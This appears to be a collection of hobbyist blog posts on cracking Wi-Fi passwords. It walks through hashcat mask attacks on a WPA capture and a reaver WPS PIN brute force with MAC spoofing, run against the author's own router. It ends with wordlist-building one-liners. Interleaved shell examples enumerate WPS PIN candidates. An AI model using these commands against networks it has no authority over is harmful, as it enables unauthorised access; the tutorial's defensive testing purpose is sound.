<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl011.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="478" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl011.jpg" width="640" /></a></div><br />
If you were to actually <i>know</i> that the first 4 digits of the passphrase are '1234' followed by 6 uppercase alpha values then you can define the 1st 4 values of '1234' directly in the mask ;<br />
<br />
<span style="color: lime;">cudaHashcat-plus64.exe -m 2500 -a 3 -n 80 capture_fubar.hccap 1234?u?u?u?u?u?u</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl012.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="640" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl012.jpg" width="593" /></a></div><br />
Of course the above examples are for the purpose of explanation only and probably not realistic for real-world scenarios, but I hope it shows at least a small part of how oclHashcat-plus can work.<br />
<br />
<br />
oclHashcat-plus is truly an awesome bit of kit, the speeds are certainly astonishing to me since I was used<br />
to non-GPU speeds before ;) 30 minutes to get through an 8 digit numeric wordlist ?!! awesome..<br />
And that's just on my nVidia GTX590 which sucks big time compared with the benchmarks I see on hashcat's site for the ATI cards..<br />
<br />
There are many, many other options I need to get my head around; rules, dictionary mangling, bruteforce, the list goes on and on .. !<br />
A lot more reading and testing required...<br />
<br />
A good tip is to also check out the GUI for oclHashcat; it shows you the command line it builds,<br />
so you can troubleshoot what you are doing wrong when running from the command line yourself.<br />
<br />
<br />
<br />
If I messed up anywhere on the above, please comment on it, have just started out trying hashcat so learning as I go !<br />
<br />
<br />
<br />
<b>Linkage/Credits; </b><br />
<br />
<a href="http://hashcat.net/oclhashcat-plus/" target="_blank">http://hashcat.net/oclhashcat-plus/</a> <br />
<br />
<a href="http://danielweis.wordpress.com/2011/10/13/gpu-password-cracking-of-wpa-using-airodump-oclhachcat-gui-a-basic-how-to/" target="_blank">http://danielweis.wordpress.com/2011/10/13/gpu-password-cracking-of-wpa-using-airodump-oclhachcat-gui-a-basic-how-to/</a><br />
<br />
d3ad0ne's awesomeness ;<br />
<a href="http://ob-security.info/?p=31" target="_blank">http://ob-security.info/?p=31</a><br />
<a href="http://pauldotcom.com/2010/10/your-password-cracking-system.html" target="_blank">http://pauldotcom.com/2010/10/your-password-cracking-system.html</a><br />
<a href="http://ob-security.info/?p=274" target="_blank">http://ob-security.info/?p=274</a><br />
<br />
<b>Cracking WPA using the WPS vulnerability with reaver v1.3</b> (posted 2012-01-18, last updated 2013-06-17)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
REAVER > WPS<br />
<br />
<span style="color: red;">WPS functionality leaves some routers at risk, even when WPS is 'not configured / disabled'..</span><br />
=====================================================================<br />
<br />
As most people will have seen by now, the WPS function, which is present on nearly<br />
all current routers, has been shown to be vulnerable (<a href="https://docs.google.com/spreadsheet/ccc?key=0Ags-JmeLMFP2dFp2dkhJZGIxTTFkdFpEUDNSSHZEN3c#gid=0">on some routers</a>) to a 2-stage brute-force<br />
attack on the router's 8 digit PIN.<br />
An extract from the readme from the author's google code page<br />
<a href="http://code.google.com/p/reaver-wps/wiki/README">http://code.google.com/p/reaver-wps/wiki/README</a> ;<br />
<br />
<i>Reaver performs a brute force attack against the AP, attempting every possible combination in order to guess the AP's 8 digit pin number. Since the pin numbers are all numeric, there are 10^8 (100,000,000) possible values for any given pin </i><br />
<i>The key space is reduced even further due to the fact that the WPS authentication protocol cuts the pin in half and validates each half individually. That means that there are 10^4 (10,000) possible values for the first half of the pin and 10^3 (1,000) possible values for the second half of the pin, with the last digit of the pin being a checksum.</i><br />
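To see why that split validation matters so much, here is an added example (my own illustration, not code from the post or from reaver) in POSIX shell: it computes the WPS checksum digit the way the WPS specification defines it, turns a 7 digit prefix into a full PIN, checks a PIN's checksum, and enumerates the 1,000 second-half candidates that remain once the AP has accepted the first half. 12345670 is used as a known-valid PIN value for the demonstration.<br />

```shell
#!/bin/sh
# WPS PIN checksum and keyspace (added example, not from the post or reaver).
# The 8th digit of a WPS PIN is a checksum over the first 7, so reaver only
# has to guess 7 free digits, and the AP validates them in two halves.

# Strip leading zeros so the shell never reads "0012345" as octal.
_dec() {
    v=$(printf '%s' "$1" | sed 's/^0*//')
    echo "${v:-0}"
}

# Checksum digit for a 7 digit PIN prefix: digits 1,3,5,7 weigh 3, digits
# 2,4,6 weigh 1, and the checksum makes the total a multiple of 10.
wps_checksum() {
    pin=$(_dec "$1")
    accum=0
    while [ "$pin" -gt 0 ]; do
        accum=$((accum + 3 * (pin % 10)))
        pin=$((pin / 10))
        accum=$((accum + pin % 10))
        pin=$((pin / 10))
    done
    echo $(( (10 - accum % 10) % 10 ))
}

# Full 8 digit PIN for a 7 digit prefix.
wps_pin() {
    printf '%07d%d\n' "$(_dec "$1")" "$(wps_checksum "$1")"
}

# Is the checksum digit of this 8 digit PIN correct?  Exit status 0 = yes.
wps_pin_valid() {
    p=$1
    [ ${#p} -eq 8 ] || return 1
    [ "$(wps_checksum "${p%?}")" -eq "$(_dec "${p#???????}")" ]
}

# Once the first half (4 digits) is accepted, only the 3 free digits of the
# second half remain: 1,000 candidate PINs, each with its checksum appended.
wps_second_half_candidates() {
    first=$1
    i=0
    while [ "$i" -le 999 ]; do
        wps_pin "$(printf '%04d%03d' "$(_dec "$first")" "$i")"
        i=$((i + 1))
    done
}

# Worst case number of guesses: 10^4 for the first half + 10^3 for the second,
# instead of 10^8 for an unstructured 8 digit PIN.
wps_max_guesses() {
    echo $((10000 + 1000))
}

wps_pin 1234567                            # 12345670
wps_pin_valid 12345670 && echo "12345670 has a valid checksum"
wps_second_half_candidates 1234 | wc -l    # 1000
wps_max_guesses                            # 11000
```

The same arithmetic is why a vendor "disabling" the PIN in the web UI is the only fix that counts: with the checksum and the two-stage validation, the worst case is 11,000 attempts regardless of how random the PIN is.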
<br />
Now as soon as I had heard about this tool, I immediately checked to make sure that WPS was not configured on my router.<br />
As I always configure it manually, I was pretty sure WPS was disabled, and as I thought, WPS was not configured.<br />
<br />
<br />
Router information ; Cisco Linksys E1000 v2.0, Firmware v. 2.0.01<br />
I checked the router settings, made sure WPS was not configured then rebooted router ;<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wps01.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="357" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wps01.jpg" width="640" /></a></div>
<br />
Little did I know that even though I had chosen not to use WPS, WPS was <b><i><span style="color: red;">not </span></i></b>in fact disabled and the router was still vulnerable, which I found out after seeing it mentioned on the <a href="http://www.backtrack-linux.org/forums/showthread.php?t=47038">BackTrack forums</a> and checking my own setup later on ...<br />
<b><span style="color: red;">WTF..</span></b><br />
In retrospect, the term "<b><i>Configuration view</i></b>" does not say whether it is, or is not configured/enabled....<br />
Well played <strike>lawyers</strike> Linksys...<br />
<br />
I could not find any other possibility to alter the WPS settings on the router or any way to disable the PIN.<br />
<i>(There is actually a firmware upgrade for the router; v2.1.02, issued on 25-05-2011, so although the update may prevent</i><i> the WPS vulnerability or give more options to REALLY disable WPS, I haven't checked its possibilities as yet).</i><br />
<br />
<br />
Fired up BackTrack and specified airodump to focus only on my AP and to capture packets.<br />
<span style="color: lime;">airmon-ng start wlan0</span><br />
<span style="color: lime;">airodump-ng mon0 -c 11 -t wpa -d 98:FC:11:8E:0E:9C -a -w wps_test</span><br />
<br />
After capturing just a few packets I stopped the capture and checked in Wireshark to see whether there was any info on WPS..<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wps02.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="381" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wps02.jpg" width="640" /></a></div>
<br />
lolwut ?!<br />
<br />
<br />
Downloaded and installed reaver (as of this date 18-01-2012 reaver v1.3) <br />
<a href="http://code.google.com/p/reaver-wps/">http://code.google.com/p/reaver-wps/</a><br />
<br />
<span style="color: lime;">tar -xzf reaver-1.3.tar.gz</span><br />
<span style="color: lime;">cd reaver-1.3/src/</span><br />
<span style="color: lime;">./configure</span><br />
<span style="color: lime;">make && make install</span><br />
(the build needs the libpcap and sqlite3 development headers to be installed first)<br />
<br />
and used reaver's included 'walsh' to check my AP (<b>walsh</b> was later renamed to <b>wash</b>) ;<br />
<br />
<br />
<span style="color: lime;">walsh</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wps03.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="357" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wps03.jpg" width="640" /></a></div>
<br />
Testing Walsh ;<br />
<span style="color: lime;">walsh -i mon0 -c 11 -C -s</span><br />
(just a simple <span style="color: lime;">walsh -i mon0</span> worked fine for me as well by the way, just limiting results with the above)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wps04.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="204" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wps04.jpg" width="640" /></a></div>
<br />
Damn..<br />
<br />
<br />
OK, so decided to see whether it actually was still vulnerable and so started reaver and let it do its thing.<br />
<br />
I got many warnings that 10 attempts failed in a row, receive timeout issues etc, so I basically did a few<br />
hours 3 days in a row, reaver saves the previous session in any case, so you can do it as and<br />
when you please..<br />
Tested on a Samsung N110, Atheros chipset, ath5k drivers for the wireless.<br />
<br />
<br />
<span style="color: lime;">reaver -i mon0 -f -c 11 -b 98:FC:11:8E:0E:9C -vv -x 60 </span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wps06.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wps06.jpg" width="640" /></a></div>
<br />
Anyway, the final outcome.. BAH !<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wps05.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wps05.jpg" width="640" /></a></div>
<br />
damn.. hacked.. !<br />
And here I was thinking I was nice and cosy in my "secure WPA2" world..<br />
The time used as mentioned above is not completely accurate as I had split the crack over 3 days with<br />
a few hours at a time, would imagine that in total it took between 10 - 12 hours in my case, possibly a couple of hours more.<br />
<br />
I had better results (less errors) when using a wireless adapter with REALTEK RTL8187L chipset with<br />
the rtl8187 driver.<br />
<br />
<br />
<br />
So, what to do ?<br />
Well, in my case, I bought a different/better router the day after I figured out that my router was still vulnerable.. screw it.. otherwise I was going to stay feeling uncertain ;)<br />
<br />
Other cheaper options ;<br />
<span style="color: red;"><b>></b></span> Check for firmware updates, possibly a revised firmware is available to counter the vulnerability.<br />
<span style="color: red;"><b>></b></span> Use 3rd party firmware (if supported) such as the likes of Open WRT or DD-WRT.<br />
(DD-WRT for instance does not support WPS and is therefore not vulnerable to the reaver attack)<br />
<br />
<span style="color: red;"><i>Edit 22-01-2012</i></span><br />
--------<br />
My previous remarks on MAC spoofing being an issue were incorrect.<br />
RTFM TAPE .. :|<br />
<a href="http://code.google.com/p/reaver-wps/wiki/FAQ">http://code.google.com/p/reaver-wps/wiki/FAQ</a><br />
For MAC spoofing to work with reaver, the physical interface must carry the spoofed MAC as well, not just the monitor interface.<br />
<br />
Depends on your setup, however in my case<br />
> wlan0 physical interface.<br />
> mac address 00:11:22:33:44:55 as the mac address to be spoofed.<br />
<span style="color: lime;">ifconfig wlan0 down </span><br />
<span style="color: lime;">macchanger -m 00:11:22:33:44:55 wlan0 </span><br />
<span style="color: lime;">airmon-ng start wlan0</span><br />
<br />
<i>monitor mode then enabled on the created mon0 interface</i><br />
<br />
<span style="color: lime;">ifconfig mon0 down</span><br />
<span style="color: lime;">macchanger -m 00:11:22:33:44:55 mon0 </span><br />
<span style="color: lime;">ifconfig wlan0 up </span><br />
<div>
<span style="color: lime;">ifconfig mon0 up</span></div>
<div>
<br />
Then start up the reaver attack and it should all run as intended. <br />
--------<br />
<br />
<span style="color: red;"><i>Edit 28-01-2012</i></span><br />
--------<br />
I have been having issues with the latest version of reaver; v1.4, with it failing to associate<br />
whereas v1.3 associated fine.<br />
Apparently there are others also having issues when running it on BT5, some also seem<br />
to report that an apt-get update && apt-get upgrade on the BT5 system is what caused<br />
the problems for them.<br />
<br />
<a href="http://code.google.com/p/reaver-wps/issues/detail?id=172">http://code.google.com/p/reaver-wps/issues/detail?id=172</a> <br />
<br />
For the time being the author of reaver simply advises sticking with Ubuntu 10.04, which is<br />
his testing platform.<br />
<br />
So if you are having trouble with reaver v1.4, perhaps try the previous version; reaver v1.3.</div>
<div>
<a href="http://code.google.com/p/reaver-wps/downloads/list">http://code.google.com/p/reaver-wps/downloads/list</a></div>
<div>
<br />
Would appreciate anyone's feedback on their experiences with v1.4 if there are any.<br />
--------<br />
<br />
<span style="color: red;"><i>Update 04-02-2012</i></span><br />
--------<br />
<br />
Well I have made some progress with reaver v1.4, the below done on a VMware BT5R1 image.<br />
<br />
Installed reaver v1.4 from the BT repositories ;<br />
<span style="color: lime;">apt-get update</span><br />
<span style="color: lime;">apt-get install reaver</span><br />
<br />
reaver v1.4 includes the new wash (formerly walsh)<br />
<br />
<span style="color: lime;">wash</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/reaver01.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="422" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/reaver01.jpg" width="640" /></a></div>
<br />
Carried out a quick scan with wash to get the details of my (now committed to the shelf of shame..) router.<br />
Using a wireless adapter with <i>Realtek RTL8187L chipset</i> with<i> rtl8187</i> driver in this case.<br />
Started the wireless interface on the channel of my AP (Channel 11)<br />
(as was having issues with aireplay-ng when I had not specified the channel that should be used)<br />
<span style="color: lime;">airmon-ng start wlan0 11</span><br />
<span style="color: lime;">wash -i mon0 -C</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/reaver02.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="422" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/reaver02.jpg" width="640" /></a></div>
<br />
Now previously I was having trouble getting reaver v1.4 to associate to my router for some reason, so<br />
I decided to try to associate with another application, and then use the -A switch in reaver so as to not<br />
have reaver itself associate.<br />
<br />
So started aireplay-ng with fake association options.<br />
I found that having a longer delay resulted in a better performance with reaver, but you will have to play around to see what works best for your setup.<br />
<br />
<span style="color: lime;">aireplay-ng mon0 -1 120 -a 98:FC:11:8E:0E:9C -e FUBAR</span> <br />
<span style="color: lime;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/reaver05.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="402" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/reaver05.jpg" width="640" /></a></div>
<br />
Then fired up reaver v1.4 ;<br />
<br />
<span style="color: lime;">reaver</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/reaver03.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="518" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/reaver03.jpg" width="640" /></a></div>
<br />
and started reaver v1.4 with the -A switch, to not have reaver associate with the router itself, in a separate terminal window ;<br />
<br />
<span style="color: lime;">reaver -i mon0 -A -b 98:FC:11:8E:0E:9C -v</span><br />
(reaver v1.4 produces a lot more output, hence only a single -v here)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/reaver04.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="402" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/reaver04.jpg" width="640" /></a></div>
<br />
The result ;<br />
A continuous stream of 2 seconds per pin attempt, which is much better than previously encountered<br />
with v1.3 to be honest.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/reaver06.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="402" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/reaver06.jpg" width="640" /></a></div>
<br />
So, at least there is a work around, however still strange that reaver v1.4 won't work 'out of the box'<br />
for me on BT.. Oh well, maybe v1.5 will be released to straighten things out ;)<br />
--------<br />
<b><span style="color: red;"><i>Edit 26-02-2012</i></span></b><br />
The latest upgrade to BT5 R2 seems to have helped with my association issues !<br />
Yay !<br />
So getting the latest and greatest on my HDD install of BT5 R1, doing an ;<br />
<span style="color: lime;">apt-get update </span><br />
<span style="color: lime;">apt-get dist-upgrade</span><br />
Did the trick for me in getting it working the way it was meant to.<br />
<br />
A fresh install of BT5 R2 is recommended as I was having issues again after updating<br />
to include the latest repositories as suggested in the <a href="http://www.backtrack-linux.org/backtrack/upgrading-to-backtrack-5-r2/" target="_blank">BackTrack blogpost</a>.<br />
<br />
For me, with a fresh install of BT5 R2, reaver is working well and as intended, and with<br />
the -d option set to 0 or 1 it really blasted through that router on the shelf of shame.<br />
--------<br />
<br />
<br />
<b><span style="color: red;">This type of attack is a real problem for many people and it would be more than foolish not to check your routers asap.</span></b><br />
<br />
<br />
So .. check your routers asap !</div>
</div>
<b>Wordlist manipulation revisited</b> (posted 2011-07-24, last updated 2013-01-28)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="color: red;">
<b>Work In Progress !</b></div>
<div style="color: red;">
<br /></div>
<b>Word List Manipulator</b><br />
<b>==================</b><br />
<b>A script to facilitate the commonly used options to make an existing </b><br />
<b>wordlist more to your liking.. </b><br />
<b>Downloads below and based on using the </b><b>script in Backtrack although it should work</b><br />
<b>in most Linux environments.</b><br />
<b><br /></b>
<b>Google code + WIKI ; </b>
<b><a href="http://code.google.com/p/wordlist-manipulator/" target="_blank">http://code.google.com/p/wordlist-manipulator/</a></b><br />
<b><br /></b>
<b><span style="color: red;"><u>Edit 21-10-2012</u></span></b><br />
<b>Release of WLM v0.7 ;</b><br />
<span style="color: #0000ee;"><b><u>http://www.mediafire.com/file/p1tn76qw95hobi4/wlm</u></b></span><br />
Video using WLM in BackBox ;<br />
<a href="http://www.youtube.com/watch?v=FpflByHLp1I">http://www.youtube.com/watch?v=FpflByHLp1I</a>
<br />
<br />
<br />
<b><iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="http://www.youtube.com/embed/FpflByHLp1I" width="420"></iframe>
</b>
<b><br /></b>
<br />
--------------------------------------------<br />
<br />
<div style="color: yellow;">
<u><b>INTRO</b></u></div>
After my posts from just over 2 years ago (wow... thought I would have learned more by now .. )<br />
I thought it would be a good idea to have another, more detailed post on wordlist manipulation based on 'simple' one-liners or small scripts (sometimes 1 line just doesn't cut it) which can be run over a wordlist.<br />
<br />
For some reason I always manage to forget the best way to do the simplest of things using sed and the like, so this is as much a reference for me as it is, hopefully, some help to those looking for quick answers !<br />
My intention is to look at and test any wordlist manipulation queries posted in the comments,<br />
and then post the best solution I can find for them.<br />
<br />
There will be quite a bit of duplication from the previous post on wordlist manipulation, but no harm in that,<br />
I find myself returning to 'old' info all the time..<br />
<br />
<br />
<div style="color: yellow;">
<u><br />
</u></div>
<div style="color: yellow;">
<u><b>MANIPULATING WORDLISTS</b></u></div>
<br />
When you have a wordlist, it often needs fine-tuning or alteration of some kind in order to get the<br />
most out of it, sometimes heavy-duty alteration, other times minor adjustments such as splitting the wordlist into manageable sizes or capitalizing the first letter for instance.<br />
<br />
The below examples are based on wordlists that have already been created and need some sort of tweaking or fine tuning.<br />
Of course you can create wordlists from scratch how you like with for instance crunch, however this post is meant solely for altering existing wordlists.<br />
<br />
Note that the below examples were all done on BackTrack 5 and not tested on any other OS.<br />
(although most commands should work on most Linux based systems)<br />
<br />
<div style="color: yellow;">
<u><b>SPLITTING WORDLISTS</b></u></div>
<br />
One of the main issues with wordlists is that they can get hellishly big.. and you may need to split them;<br />
> for easy storage on portable drives,<br />
> because some programs only accept a certain maximum wordlist size,<br />
> to distribute segments of the wordlist to be tested by others,<br />
etc.<br />
etc.<br />
<br />
First thing to do is to check the size of the file and how many lines(passphrases) are in it so you can estimate<br />
how you can best split it.<br />
In this case using a 6-character wordlist of 16777216 lines (that is 16^6, so a 16-character set such as the hex digits 0-9a-f; a full 26-letter lowercase alphabet would give 26^6 = 308915776 lines). <br />
Check the size of the wordlist ;<br />
For info on size in bytes ; <br />
<div style="color: lime;">
du -b wordlist1.txt</div>
or<br />
Simple view of size in 'human readable' format (eg. 100K, 100M, 100G); <br />
<div style="color: lime;">
du -h wordlist1.txt</div>
<br />
Get the linecount of the wordlist ;<br />
<div style="color: lime;">
wc -l wordlist1.txt</div>
<br />
So in the above example the size is around 112MB and there are 16777216<br />
lines (so 16777216 passphrases).<br />
When splitting wordlists, always split by line count rather than by size, so that you don't accidentally cut a word in half as can happen when splitting by byte size.<br />
<br />
Let's say we want to split that file into 3 wordlists; 16777216 / 3 is roughly 5,600,000, so each split file needs to hold up to about 5,600,000 lines.<br />
If you are too lazy to work the little grey cells, let 'bc' do the work for you so you can make an educated guess on how many lines you want to have per split wordlist ; <br />
<div style="color: lime;">
<br /></div>
<div style="color: lime;">
echo "16777216 / 3" | bc</div>
<br />
<div style="color: lime;">
split -d -l 5600000 wordlist1.txt split-list</div>
-d == use numeric suffixes for the created files (split-list00, split-list01, ...)<br />
-l == the maximum number of lines each file should contain<br />
wordlist1.txt is the input wordlist<br />
split-list is the prefix for the newly created split files.<br />
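As an added example (my own, not from the post) the whole procedure in one POSIX shell function: work out the lines per part by ceiling division so the last few lines are never dropped, split by line count, and then check that the parts concatenated in suffix order are byte-identical to the original before you delete anything. The 10-line list in the demo is constructed for the example.<br />

```shell
#!/bin/sh
# Split a wordlist into N roughly equal parts by LINE count (never by byte
# size, which can cut a word in half) and verify that the parts re-assemble
# to the original. Added example, not from the post.
#   split_wordlist FILE PARTS PREFIX   -> prints the number of parts created
# PREFIX must not match any existing file, since PREFIX* is used to collect
# the parts afterwards.

# Lines per part: ceiling division, so PARTS files cover every line.
lines_per_part() {
    echo $(( ($1 + $2 - 1) / $2 ))
}

split_wordlist() {
    file=$1 parts=$2 prefix=$3
    lines=$(( $(wc -l < "$file") ))
    per=$(lines_per_part "$lines" "$parts")
    split -d -l "$per" "$file" "$prefix"
    # pieces concatenated in suffix order must be byte-identical to the input
    cat "$prefix"* | cmp -s - "$file" || {
        echo "split verification failed for $file" >&2
        return 1
    }
    n=0
    for f in "$prefix"*; do n=$((n + 1)); done
    echo "$n"
}

# Demo on a constructed 10-line list (not a real wordlist) in a temp dir.
demo_split() {
    d=$(mktemp -d)
    seq 1 10 > "$d/wordlist1.txt"
    split_wordlist "$d/wordlist1.txt" 3 "$d/split-list"   # 3 parts: 4 + 4 + 2 lines
    wc -l "$d"/split-list*
    rm -r "$d"
}

lines_per_part 16777216 3   # 5592406
demo_split
```

With GNU split the numeric suffixes sort in the same order the lines were read, so the plain glob is enough to re-assemble them for the comparison.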
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/split.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/split.jpg" width="640" /></a></div>
<br />
<div style="color: yellow;">
<u><b>JOINING/COMBINING WORDLISTS</b></u></div>
<br />
To combine separate wordlists into one list, you can use the 'cat' command as follows ;<br />
<span class="Apple-style-span" style="color: lime;">cat wordlist1.txt wordlist2.txt > combined-wordlist.txt</span><br />
<br />
Depending on the size of your wordlists this can take a wee while..<br />
<br />
You can also combine all .txt files in a directory to one larger file ;<br />
<span class="Apple-style-span" style="color: lime;">cat *.txt > combinedlists.txt </span><br />
<br />
<br />
<div style="color: yellow;">
<br /></div>
<div style="color: yellow;">
<u><b>CHANGING THE 'CASE' OF LETTERS IN A WORDLIST</b></u></div>
<br />
Changing characters in a wordlist at a given position to either lower case or upper case is a frequent necessity.<br />
Of course wordlists can easily be created with the required case in the required position (see my post on using the awesome crunch) however if you have an existing wordlist (which this post is all about) and need<br />
to adjust the cases as required, this is (one of the ways) how to go about it. Note that the \u and \l case-conversion escapes used below are GNU sed extensions.<br />
<br />
<span style="color: yellow;">CHANGING LETTERS TO LOWER / UPPER CASE</span><br />
<br />
Changing the first letters of all entries to upper case ; <br />
<span class="Apple-style-span" style="color: lime;">sed 's/^./\u&/' wordlist.txt</span><br />
<br />
Changing the last letter of all entries to upper case ;<br />
<span class="Apple-style-span" style="color: lime;">sed 's/.$/\u&/' wordlist.txt</span><br />
<br />
Changing the first letter of all entries to lower case ;<br />
<span class="Apple-style-span" style="color: lime;">sed 's/^./\l&/' wordlist.txt</span><br />
<br />
Changing the last letter of all entries to lower case ;<br />
<span class="Apple-style-span" style="color: lime;">sed 's/.$/\l&/' wordlist.txt</span><br />
<br />
Changing all upper case to lower case letters;<br />
<span class="Apple-style-span" style="color: lime;">tr '[:upper:]' '[:lower:]' < wordlist.txt</span><br />
<br />
Changing all lower case to upper case letters;<br />
<span class="Apple-style-span" style="color: lime;">tr '[:lower:]' '[:upper:]' < wordlist.txt</span><br />
<br />
<br />
Inverting the case in the words ;<br />
<div style="color: lime;">
tr 'a-z A-Z' 'A-Z a-z' < wordlist.txt</div>
or<br />
<span style="color: lime;">sed 'y/abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz/' wordlist.txt</span><br />
<br />
<br />
<div style="color: yellow;">
<u><b>PREFIXING CHARACTER(S)/WORDS TO WORDLISTS</b></u></div>
<br />
To prefix the word "test" to all lines in the wordlist (anchor on the empty start of line, ^, so no characters are replaced) ;<br />
<span class="Apple-style-span" style="color: lime;">sed 's/^/test/' wordlist.txt</span><br />
or<br />
<span class="Apple-style-span" style="color: lime;">awk '{print "test" $0 }' wordlist.txt</span><br />
<br />
<br />
<b><u>PREFIXING NUMERIC VALUES TO WORDLISTS</u></b><br />
<br />
To prefix 1 digit in sequence from 0 - 9 ;<br />
<span class="Apple-style-span" style="color: lime;">for i in $(cat wordlist.txt) ; do seq -f %01.0f$i 0 9 ; done > numbers_wordlist.txt</span><br />
<br />
To prefix 2 digits in sequence from 00 - 99 ;<br />
<span class="Apple-style-span" style="color: lime;">for i in $(cat wordlist.txt) ; do seq -f %02.0f$i 0 99 ; done > numbers_wordlist.txt</span><br />
<br />
To prefix up to 2 digits in sequence from 0 - 99 ;<br />
<span class="Apple-style-span" style="color: lime;">for i in $(cat wordlist.txt) ; do seq -f %01.0f$i 0 99 ; done > numbers_wordlist.txt</span><br />
<br />
To prefix 3 digits in sequence from 000 - 999<br />
<span class="Apple-style-span" style="color: lime;">for i in $(cat wordlist.txt) ; do seq -f %03.0f$i 0 999 ; done > numbers_wordlist.txt</span><br />
<br />
To prefix up to 3 digits in sequence from 0 - 999 ;<br />
<span class="Apple-style-span" style="color: lime;">for i in $(cat wordlist.txt) ; do seq -f %01.0f$i 0 999 ; done > numbers_wordlist.txt</span><br />
<div>
<br /></div>
<br />
<br />
<span class="Apple-style-span" style="color: yellow;"><u><b>SUFFIXING CHARACTER(S)/WORDS TO WORDLISTS</b></u></span><br />
<br />
To suffix the word "test" to each line in the wordlist (anchor on the end of line, $, so the last character is kept) ;<br />
<span class="Apple-style-span" style="color: lime;">sed 's/$/test/' wordlist.txt</span><br />
or<br />
<span class="Apple-style-span" style="color: lime;">awk '{print $0 "test"}' wordlist.txt</span><br />
<br />
<br />
<b><u>SUFFIXING NUMERIC VALUES TO WORDLISTS</u></b><br />
<br />
To suffix 1 digit in sequence from 0 - 9<br />
<div>
<span class="Apple-style-span" style="color: lime;">for i in $(cat wordlist.txt) ; do seq -f $i%01.0f 0 9 ; done > wordlist_numbers.txt</span><br />
<div>
<br /></div>
</div>
To suffix 2 digits in sequence from 00 - 99<br />
<span class="Apple-style-span" style="color: lime;">for i in $(cat wordlist.txt) ; do seq -f $i%02.0f 0 99 ; done > wordlist_numbers.txt</span><br />
<br />
To suffix up to 2 digits in sequence from 0 - 99 ;<br />
<span class="Apple-style-span" style="color: lime;">for i in $(cat wordlist.txt) ; do seq -f $i%01.0f 0 99 ; done > wordlist_numbers.txt</span><br />
<div>
<br /></div>
To suffix 3 digits in sequence from 000 - 999 ;<br />
<span class="Apple-style-span" style="color: lime;">for i in $(cat wordlist.txt) ; do seq -f $i%03.0f 0 999 ; done > wordlist_numbers.txt</span><br />
<br />
<div>
